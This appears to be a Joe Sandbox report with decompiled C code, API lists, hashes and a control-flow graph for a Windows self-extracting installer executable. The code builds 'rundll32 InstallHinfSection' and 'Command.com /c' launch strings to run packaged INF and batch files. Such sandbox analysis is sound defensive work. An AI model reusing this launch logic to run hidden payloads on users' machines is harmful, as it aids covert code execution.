                                                                                                                                                                                                                                            				char _v1552;
                                                                                                                                                                                                                                            				CHAR* _v1556;
                                                                                                                                                                                                                                            				int* _v1560;
                                                                                                                                                                                                                                            				CHAR** _v1564;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t48;
                                                                                                                                                                                                                                            				CHAR* _t53;
                                                                                                                                                                                                                                            				CHAR* _t54;
                                                                                                                                                                                                                                            				char* _t57;
                                                                                                                                                                                                                                            				char* _t58;
                                                                                                                                                                                                                                            				CHAR* _t60;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				signed char _t65;
                                                                                                                                                                                                                                            				intOrPtr _t76;
                                                                                                                                                                                                                                            				intOrPtr _t77;
                                                                                                                                                                                                                                            				unsigned int _t85;
                                                                                                                                                                                                                                            				CHAR* _t90;
                                                                                                                                                                                                                                            				CHAR* _t92;
                                                                                                                                                                                                                                            				char _t105;
                                                                                                                                                                                                                                            				char _t106;
                                                                                                                                                                                                                                            				CHAR** _t111;
                                                                                                                                                                                                                                            				CHAR* _t115;
                                                                                                                                                                                                                                            				intOrPtr* _t125;
                                                                                                                                                                                                                                            				void* _t126;
                                                                                                                                                                                                                                            				CHAR* _t132;
                                                                                                                                                                                                                                            				CHAR* _t135;
                                                                                                                                                                                                                                            				void* _t138;
                                                                                                                                                                                                                                            				void* _t139;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				intOrPtr* _t146;
                                                                                                                                                                                                                                            				char* _t148;
                                                                                                                                                                                                                                            				CHAR* _t151;
                                                                                                                                                                                                                                            				void* _t152;
                                                                                                                                                                                                                                            				CHAR* _t155;
                                                                                                                                                                                                                                            				CHAR* _t156;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				signed int _t158;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t48 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                                                            				_t108 = __ecx;
                                                                                                                                                                                                                                            				_v1564 = _a4;
                                                                                                                                                                                                                                            				_v1560 = _a8;
                                                                                                                                                                                                                                            				E010D1680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                                                            				if(_v528 != 0x22) {
                                                                                                                                                                                                                                            					_t135 = " ";
                                                                                                                                                                                                                                            					_t53 =  &_v528;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t135 = "\"";
                                                                                                                                                                                                                                            					_t53 =  &_v527;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t111 =  &_v1556;
                                                                                                                                                                                                                                            				_v1556 = _t53;
                                                                                                                                                                                                                                            				_t54 = E010D1A84(_t111, _t135);
                                                                                                                                                                                                                                            				_t156 = _v1556;
                                                                                                                                                                                                                                            				_t151 = _t54;
                                                                                                                                                                                                                                            				if(_t156 == 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					_push(_t111);
                                                                                                                                                                                                                                            					E010D1781( &_v268, 0x104, _t111, 0x10d91e4);
                                                                                                                                                                                                                                            					E010D658A( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            					goto L13;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t132 = _t156;
                                                                                                                                                                                                                                            					_t148 =  &(_t132[1]);
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t105 =  *_t132;
                                                                                                                                                                                                                                            						_t132 =  &(_t132[1]);
                                                                                                                                                                                                                                            					} while (_t105 != 0);
                                                                                                                                                                                                                                            					_t111 = _t132 - _t148;
                                                                                                                                                                                                                                            					if(_t111 < 3) {
                                                                                                                                                                                                                                            						goto L12;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t106 = _t156[1];
                                                                                                                                                                                                                                            					if(_t106 != 0x3a || _t156[2] != 0x5c) {
                                                                                                                                                                                                                                            						if( *_t156 != 0x5c || _t106 != 0x5c) {
                                                                                                                                                                                                                                            							goto L12;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L11;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						L11:
                                                                                                                                                                                                                                            						E010D1680( &_v268, 0x104, _t156);
                                                                                                                                                                                                                                            						L13:
                                                                                                                                                                                                                                            						_t138 = 0x2e;
                                                                                                                                                                                                                                            						_t57 = E010D66C8(_t156, _t138);
                                                                                                                                                                                                                                            						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            							_t139 = 0x2e;
                                                                                                                                                                                                                                            							_t115 = _t156;
                                                                                                                                                                                                                                            							_t58 = E010D66C8(_t115, _t139);
                                                                                                                                                                                                                                            							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x400);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									goto L43;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t65 = GetFileAttributesA( &_v268); // executed
                                                                                                                                                                                                                                            								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                                                                                                                                                                                                                                            									E010D1680( &_v1552, 0x400, _t108);
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_push(_t115);
                                                                                                                                                                                                                                            									_t108 = 0x400;
                                                                                                                                                                                                                                            									E010D1781( &_v1552, 0x400, _t115,  &_v268);
                                                                                                                                                                                                                                            									if(_t151 != 0 &&  *_t151 != 0) {
                                                                                                                                                                                                                                            										E010D16B3( &_v1552, 0x400, " ");
                                                                                                                                                                                                                                            										E010D16B3( &_v1552, 0x400, _t151);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t140 = _t156;
                                                                                                                                                                                                                                            								 *_t156 = 0;
                                                                                                                                                                                                                                            								E010D2AAC( &_v1552, _t156, _t156);
                                                                                                                                                                                                                                            								goto L53;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t108 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t125 = "Command.com /c %s";
                                                                                                                                                                                                                                            								_t145 = _t125 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t76 =  *_t125;
                                                                                                                                                                                                                                            									_t125 = _t125 + 1;
                                                                                                                                                                                                                                            								} while (_t76 != 0);
                                                                                                                                                                                                                                            								_t126 = _t125 - _t145;
                                                                                                                                                                                                                                            								_t146 =  &_v268;
                                                                                                                                                                                                                                            								_t157 = _t146 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t77 =  *_t146;
                                                                                                                                                                                                                                            									_t146 = _t146 + 1;
                                                                                                                                                                                                                                            								} while (_t77 != 0);
                                                                                                                                                                                                                                            								_t140 = _t146 - _t157;
                                                                                                                                                                                                                                            								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                                                            								if(_t156 != 0) {
                                                                                                                                                                                                                                            									E010D171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                                                            									goto L53;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L43;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                                                            							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                                                            								_t140 = 0x525;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_t60 =  &_v268;
                                                                                                                                                                                                                                            								goto L35;
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t140 = "[";
                                                                                                                                                                                                                                            								_v1556 = _t151;
                                                                                                                                                                                                                                            								_t90 = E010D1A84( &_v1556, "[");
                                                                                                                                                                                                                                            								if(_t90 != 0) {
                                                                                                                                                                                                                                            									if( *_t90 != 0) {
                                                                                                                                                                                                                                            										_v1556 = _t90;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t140 = "]";
                                                                                                                                                                                                                                            									E010D1A84( &_v1556, "]");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                                                            								if(_t156 == 0) {
                                                                                                                                                                                                                                            									L43:
                                                                                                                                                                                                                                            									_t60 = 0;
                                                                                                                                                                                                                                            									_t140 = 0x4b5;
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									_push(0x10);
                                                                                                                                                                                                                                            									_push(0);
                                                                                                                                                                                                                                            									L35:
                                                                                                                                                                                                                                            									_push(_t60);
                                                                                                                                                                                                                                            									E010D44B9(0, _t140);
                                                                                                                                                                                                                                            									_t62 = 0;
                                                                                                                                                                                                                                            									goto L54;
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t155 = _v1556;
                                                                                                                                                                                                                                            									_t92 = _t155;
                                                                                                                                                                                                                                            									if( *_t155 == 0) {
                                                                                                                                                                                                                                            										_t92 = "DefaultInstall";
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									 *0x10d9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                                                            									 *_v1560 = 1;
                                                                                                                                                                                                                                            									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x10d1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                                                            										 *0x10d9a34 =  *0x10d9a34 & 0xfffffffb;
                                                                                                                                                                                                                                            										if( *0x10d9a40 != 0) {
                                                                                                                                                                                                                                            											_t108 = "setupapi.dll";
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t108 = "setupx.dll";
                                                                                                                                                                                                                                            											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										_push( &_v268);
                                                                                                                                                                                                                                            										_push(_t155);
                                                                                                                                                                                                                                            										E010D171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										 *0x10d9a34 =  *0x10d9a34 | 0x00000004;
                                                                                                                                                                                                                                            										if( *_t155 == 0) {
                                                                                                                                                                                                                                            											_t155 = "DefaultInstall";
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            										E010D1680(_t108, 0x104, _t155);
                                                                                                                                                                                                                                            										_t140 = 0x200;
                                                                                                                                                                                                                                            										E010D1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									L53:
                                                                                                                                                                                                                                            									_t62 = 1;
                                                                                                                                                                                                                                            									 *_v1564 = _t156;
                                                                                                                                                                                                                                            									L54:
                                                                                                                                                                                                                                            									_pop(_t152);
                                                                                                                                                                                                                                            									return E010D6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}














































                                                                                                                                                                                                                                            0x010d1af3
                                                                                                                                                                                                                                            0x010d1afa
                                                                                                                                                                                                                                            0x010d1b07
                                                                                                                                                                                                                                            0x010d1b09
                                                                                                                                                                                                                                            0x010d1b1a
                                                                                                                                                                                                                                            0x010d1b20
                                                                                                                                                                                                                                            0x010d1b2c
                                                                                                                                                                                                                                            0x010d1b3b
                                                                                                                                                                                                                                            0x010d1b40
                                                                                                                                                                                                                                            0x010d1b2e
                                                                                                                                                                                                                                            0x010d1b2e
                                                                                                                                                                                                                                            0x010d1b33
                                                                                                                                                                                                                                            0x010d1b33
                                                                                                                                                                                                                                            0x010d1b46
                                                                                                                                                                                                                                            0x010d1b4c
                                                                                                                                                                                                                                            0x010d1b52
                                                                                                                                                                                                                                            0x010d1b57
                                                                                                                                                                                                                                            0x010d1b5d
                                                                                                                                                                                                                                            0x010d1b61
                                                                                                                                                                                                                                            0x010d1b9f
                                                                                                                                                                                                                                            0x010d1b9f
                                                                                                                                                                                                                                            0x010d1bb1
                                                                                                                                                                                                                                            0x010d1bc2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1b63
                                                                                                                                                                                                                                            0x010d1b63
                                                                                                                                                                                                                                            0x010d1b65
                                                                                                                                                                                                                                            0x010d1b68
                                                                                                                                                                                                                                            0x010d1b68
                                                                                                                                                                                                                                            0x010d1b6a
                                                                                                                                                                                                                                            0x010d1b6b
                                                                                                                                                                                                                                            0x010d1b6f
                                                                                                                                                                                                                                            0x010d1b74
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1b76
                                                                                                                                                                                                                                            0x010d1b7b
                                                                                                                                                                                                                                            0x010d1b86
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1b8c
                                                                                                                                                                                                                                            0x010d1b8c
                                                                                                                                                                                                                                            0x010d1b98
                                                                                                                                                                                                                                            0x010d1bc7
                                                                                                                                                                                                                                            0x010d1bc9
                                                                                                                                                                                                                                            0x010d1bcc
                                                                                                                                                                                                                                            0x010d1bd3
                                                                                                                                                                                                                                            0x010d1d75
                                                                                                                                                                                                                                            0x010d1d76
                                                                                                                                                                                                                                            0x010d1d78
                                                                                                                                                                                                                                            0x010d1d7f
                                                                                                                                                                                                                                            0x010d1e05
                                                                                                                                                                                                                                            0x010d1e09
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1e12
                                                                                                                                                                                                                                            0x010d1e1b
                                                                                                                                                                                                                                            0x010d1e73
                                                                                                                                                                                                                                            0x010d1e21
                                                                                                                                                                                                                                            0x010d1e21
                                                                                                                                                                                                                                            0x010d1e28
                                                                                                                                                                                                                                            0x010d1e37
                                                                                                                                                                                                                                            0x010d1e3e
                                                                                                                                                                                                                                            0x010d1e52
                                                                                                                                                                                                                                            0x010d1e60
                                                                                                                                                                                                                                            0x010d1e60
                                                                                                                                                                                                                                            0x010d1e3e
                                                                                                                                                                                                                                            0x010d1e79
                                                                                                                                                                                                                                            0x010d1e7b
                                                                                                                                                                                                                                            0x010d1e84
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1d9b
                                                                                                                                                                                                                                            0x010d1d9b
                                                                                                                                                                                                                                            0x010d1da0
                                                                                                                                                                                                                                            0x010d1da2
                                                                                                                                                                                                                                            0x010d1da5
                                                                                                                                                                                                                                            0x010d1da5
                                                                                                                                                                                                                                            0x010d1da7
                                                                                                                                                                                                                                            0x010d1da8
                                                                                                                                                                                                                                            0x010d1dac
                                                                                                                                                                                                                                            0x010d1dae
                                                                                                                                                                                                                                            0x010d1db4
                                                                                                                                                                                                                                            0x010d1db7
                                                                                                                                                                                                                                            0x010d1db7
                                                                                                                                                                                                                                            0x010d1db9
                                                                                                                                                                                                                                            0x010d1dba
                                                                                                                                                                                                                                            0x010d1dbe
                                                                                                                                                                                                                                            0x010d1dc3
                                                                                                                                                                                                                                            0x010d1dce
                                                                                                                                                                                                                                            0x010d1dd2
                                                                                                                                                                                                                                            0x010d1deb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1df0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1dd2
                                                                                                                                                                                                                                            0x010d1bf7
                                                                                                                                                                                                                                            0x010d1bfe
                                                                                                                                                                                                                                            0x010d1c07
                                                                                                                                                                                                                                            0x010d1d55
                                                                                                                                                                                                                                            0x010d1d5a
                                                                                                                                                                                                                                            0x010d1d5b
                                                                                                                                                                                                                                            0x010d1d5d
                                                                                                                                                                                                                                            0x010d1d5e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1c1b
                                                                                                                                                                                                                                            0x010d1c1b
                                                                                                                                                                                                                                            0x010d1c20
                                                                                                                                                                                                                                            0x010d1c2c
                                                                                                                                                                                                                                            0x010d1c33
                                                                                                                                                                                                                                            0x010d1c38
                                                                                                                                                                                                                                            0x010d1c3a
                                                                                                                                                                                                                                            0x010d1c3a
                                                                                                                                                                                                                                            0x010d1c40
                                                                                                                                                                                                                                            0x010d1c4b
                                                                                                                                                                                                                                            0x010d1c4b
                                                                                                                                                                                                                                            0x010d1c5d
                                                                                                                                                                                                                                            0x010d1c61
                                                                                                                                                                                                                                            0x010d1dd4
                                                                                                                                                                                                                                            0x010d1dd4
                                                                                                                                                                                                                                            0x010d1dd6
                                                                                                                                                                                                                                            0x010d1ddb
                                                                                                                                                                                                                                            0x010d1ddc
                                                                                                                                                                                                                                            0x010d1dde
                                                                                                                                                                                                                                            0x010d1d64
                                                                                                                                                                                                                                            0x010d1d64
                                                                                                                                                                                                                                            0x010d1d67
                                                                                                                                                                                                                                            0x010d1d6c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x010d1c67
                                                                                                                                                                                                                                            0x010d1c67
                                                                                                                                                                                                                                            0x010d1c6d
                                                                                                                                                                                                                                            0x010d1c72
                                                                                                                                                                                                                                            0x010d1c74
                                                                                                                                                                                                                                            0x010d1c74
                                                                                                                                                                                                                                            0x010d1c8e
                                                                                                                                                                                                                                            0x010d1c99
                                                                                                                                                                                                                                            0x010d1cc0
                                                                                                                                                                                                                                            0x010d1cf8
                                                                                                                                                                                                                                            0x010d1d07
                                                                                                                                                                                                                                            0x010d1d23
                                                                                                                                                                                                                                            0x010d1d09
                                                                                                                                                                                                                                            0x010d1d14
                                                                                                                                                                                                                                            0x010d1d1b
                                                                                                                                                                                                                                            0x010d1d1b
                                                                                                                                                                                                                                            0x010d1d2b
                                                                                                                                                                                                                                            0x010d1d2d
                                                                                                                                                                                                                                            0x010d1d2d
                                                                                                                                                                                                                                            0x010d1d38
                                                                                                                                                                                                                                            0x010d1d39
                                                                                                                                                                                                                                            0x010d1d46
                                                                                                                                                                                                                                            0x010d1cc2
                                                                                                                                                                                                                                            0x010d1cc2
                                                                                                                                                                                                                                            0x010d1ccc
                                                                                                                                                                                                                                            0x010d1cce
                                                                                                                                                                                                                                            0x010d1cce
                                                                                                                                                                                                                                            0x010d1cdb
                                                                                                                                                                                                                                            0x010d1ce6
                                                                                                                                                                                                                                            0x010d1cee
                                                                                                                                                                                                                                            0x010d1cee
                                                                                                                                                                                                                                            0x010d1e89
                                                                                                                                                                                                                                            0x010d1e91
                                                                                                                                                                                                                                            0x010d1e92
                                                                                                                                                                                                                                            0x010d1e94
                                                                                                                                                                                                                                            0x010d1e97
                                                                                                                                                                                                                                            0x010d1ea4
                                                                                                                                                                                                                                            0x010d1ea4
                                                                                                                                                                                                                                            0x010d1c61
                                                                                                                                                                                                                                            0x010d1c07
                                                                                                                                                                                                                                            0x010d1bd3
                                                                                                                                                                                                                                            0x010d1b7b

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,010D91E4,?,?,00000000,00000001,00000000), ref: 010D1BE7
                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(?,?,010D91E4,?,?,00000000,00000001,00000000), ref: 010D1BFE
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000200,?,010D91E4,?,?,00000000,00000001,00000000), ref: 010D1C57
                                                                                                                                                                                                                                            • GetPrivateProfileIntA.KERNEL32 ref: 010D1C88
                                                                                                                                                                                                                                            • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,010D1140,00000000,00000008,?), ref: 010D1CB8
                                                                                                                                                                                                                                            • GetShortPathNameA.KERNEL32 ref: 010D1D1B
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
                                                                                                                                                                                                                                              • Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,010D9154,00010010), ref: 010D4554
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.338526724.00000000010D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338519106.00000000010D0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338553666.00000000010D8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.338572992.00000000010DC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_10d0000_sMt14vz.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                            • String ID: "$.BAT$.INF$AdvancedINF$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                            • API String ID: 383838535-3174370420
                                                                                                                                                                                                                                            • Opcode ID: ed84142cd2e4cfdebd01dab6928d1865ffd986d50b6b229d88b9822915a527e0
                                                                                                                                                                                                                                            • Instruction ID: 1cd4f7c3f0556dd74a549e06e8f287729551a4c570a57170f901a7dbfa7361c8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ed84142cd2e4cfdebd01dab6928d1865ffd986d50b6b229d88b9822915a527e0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FEA17970A003196BEB70AB38CC44FEA3BA9AF55310F1442D9E5D5A32C1DFB19E85CB50
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 406 10d2f1d-10d2f3d 407 10d2f6c-10d2f73 call 10d5164 406->407 408 10d2f3f-10d2f46 406->408 417 10d2f79-10d2f80 call 10d55a0 407->417 418 10d3041 407->418 409 10d2f5f-10d2f66 call 10d3a3f 408->409 410 10d2f48 call 10d51e5 408->410 409->407 409->418 415 10d2f4d-10d2f4f 410->415 415->418 420 10d2f55-10d2f5d 415->420 417->418 425 10d2f86-10d2fbe GetSystemDirectoryA call 10d658a LoadLibraryA 417->425 419 10d3043-10d3053 call 10d6ce0 418->419 420->407 420->409 428 10d2ff7-10d3004 FreeLibrary 425->428 429 10d2fc0-10d2fd4 GetProcAddress 425->429 431 10d3017-10d3024 SetCurrentDirectoryA 428->431 432 10d3006-10d300c 428->432 429->428 430 10d2fd6-10d2fee DecryptFileA 429->430 430->428 441 10d2ff0-10d2ff5 430->441 434 10d3054-10d305a 431->434 435 10d3026-10d303c call 10d44b9 call 10d6285 431->435 432->431 433 10d300e call 10d621e 432->433 445 10d3013-10d3015 433->445 437 10d305c call 10d3b26 434->437 438 10d3065-10d306c 434->438 435->418 447 10d3061-10d3063 437->447 443 10d307c-10d3089 438->443 444 10d306e-10d3075 call 10d256d 438->444 441->428 449 10d308b-10d3091 443->449 450 10d30a1-10d30a9 443->450 455 10d307a 444->455 445->418 445->431 447->418 447->438 449->450 456 10d3093 call 10d3ba2 449->456 453 10d30ab-10d30ad 450->453 454 10d30b4-10d30b7 450->454 453->454 458 10d30af call 10d4169 453->458 454->419 455->443 459 10d3098-10d309a 456->459 458->454 459->418 461 10d309c 459->461 461->450
                                                                                                                                                                                                                                            C-Code - Quality: 82%
                                                                                                                                                                                                                                            			E010D2F1D(void* __ecx, int __edx) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v272;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v276;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t9;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				signed int _t22;
                                                                                                                                                                                                                                            				signed int _t25;
                                                                                                                                                                                                                                            				intOrPtr* _t26;
                                                                                                                                                                                                                                            				signed int _t27;
                                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t31;
                                                                                                                                                                                                                                            				void* _t34;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t36;
                                                                                                                                                                                                                                            				intOrPtr* _t44;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            				int _t47;
                                                                                                                                                                                                                                            				void* _t58;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t43 = __edx;
                                                                                                                                                                                                                                            				_t9 =  *0x10d8004; // 0xc2f4ed82
                                                                                                                                                                                                                                            				_v8 = _t9 ^ _t46;
                                                                                                                                                                                                                                            				if( *0x10d8a38 != 0) {
                                                                                                                                                                                                                                            					L5:
                                                                                                                                                                                                                                            					_t11 = E010D5164(_t52);
                                                                                                                                                                                                                                            					_t53 = _t11;
                                                                                                                                                                                                                                            					if(_t11 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_t12 = 0;
                                                                                                                                                                                                                                            						L17:
                                                                                                                                                                                                                                            						return E010D6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t14 = E010D55A0(_t53); // executed
                                                                                                                                                                                                                                            					if(_t14 == 0) {
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t45 = 0x105;
                                                                                                                                                                                                                                            						GetSystemDirectoryA( &_v272, 0x105);
                                                                                                                                                                                                                                            						_t43 = 0x105;
                                                                                                                                                                                                                                            						_t40 =  &_v272;
                                                                                                                                                                                                                                            						E010D658A( &_v272, 0x105, "advapi32.dll");
                                                                                                                                                                                                                                            						_t36 = LoadLibraryA( &_v272);
                                                                                                                                                                                                                                            						_t44 = 0;
                                                                                                                                                                                                                                            						if(_t36 != 0) {
                                                                                                                                                                                                                                            							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                                                                                                                                                                                            							_v276 = _t31;
                                                                                                                                                                                                                                            							if(_t31 != 0) {
                                                                                                                                                                                                                                            								_t45 = _t47;
                                                                                                                                                                                                                                            								_t40 = _t31;
                                                                                                                                                                                                                                            								 *0x10da288(0x10d91e4, 0); // executed
                                                                                                                                                                                                                                            								_v276();
                                                                                                                                                                                                                                            								if(_t47 != _t47) {
                                                                                                                                                                                                                                            									_t40 = 4;
                                                                                                                                                                                                                                            									asm("int 0x29");
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						FreeLibrary(_t36);
                                                                                                                                                                                                                                            						_t58 =  *0x10d8a24 - _t44; // 0x0
                                                                                                                                                                                                                                            						if(_t58 != 0 ||  *0x10d9a30 != _t44) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							_t21 = SetCurrentDirectoryA(0x10d91e4); // executed
                                                                                                                                                                                                                                            							if(_t21 != 0) {
                                                                                                                                                                                                                                            								__eflags =  *0x10d8a2c - _t44; // 0x0
                                                                                                                                                                                                                                            								if(__eflags != 0) {
                                                                                                                                                                                                                                            									L20:
                                                                                                                                                                                                                                            									__eflags =  *0x10d8d48 & 0x000000c0;
                                                                                                                                                                                                                                            									if(( *0x10d8d48 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                            										_t26 = E010D256D( *0x10d9a40); // executed
                                                                                                                                                                                                                                            										_t44 = _t26;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									_t22 =  *0x10d8a24; // 0x0
                                                                                                                                                                                                                                            									 *0x10d9a44 = _t44;
                                                                                                                                                                                                                                            									__eflags = _t22;
                                                                                                                                                                                                                                            									if(_t22 != 0) {
                                                                                                                                                                                                                                            										L26:
                                                                                                                                                                                                                                            										__eflags =  *0x10d8a38;
                                                                                                                                                                                                                                            										if( *0x10d8a38 == 0) {
                                                                                                                                                                                                                                            											__eflags = _t22;
                                                                                                                                                                                                                                            											if(__eflags == 0) {
                                                                                                                                                                                                                                            												E010D4169(__eflags);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
